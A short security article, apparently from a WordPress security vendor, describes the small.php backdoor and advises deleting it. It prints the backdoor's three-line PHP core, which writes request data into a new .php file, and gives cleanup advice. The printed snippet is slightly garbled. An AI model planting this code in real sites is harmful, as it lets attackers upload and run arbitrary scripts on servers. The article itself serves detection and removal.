We will explain about small.php, a malware that has been expanding recently.

Small.php created in various folders on the WordPress server

This malware will generate backdoors in any folder on the server with the file name small.php. It may also be created in folders above the public html where the WordPress site data is located.

The example code is very simple

$f = fopen('random character'. .php', "w");
fputs($f,$_REQUEST['random character']);
fclose($f);

This is a type of malware called a backdoor that creates and stores programs sent via the Internet with random string names in the server.

Where did small.php get embedded from?

The fact that this file was generated on the server means that it was most likely hacked using a vulnerable plugin in WordPress, written by someone who had taken over administrative privileges, or written via other backdoors.

How to deal with small.php

In general, there is no small.php file in WordPress files.
Therefore, if you find a small.php file somewhere in your WordPress folder, you may suspect malware.

There have been cases where many of these files have been written to folders above the WordPress folder. This file cannot even be accessed externally, so if it is malware, we recommend that you delete it immediately.

Also,
Free WordPress:Malware Scan & Security Plug-in [Malware and Virus Detection and Removal]
to detect and remove Small.php malware.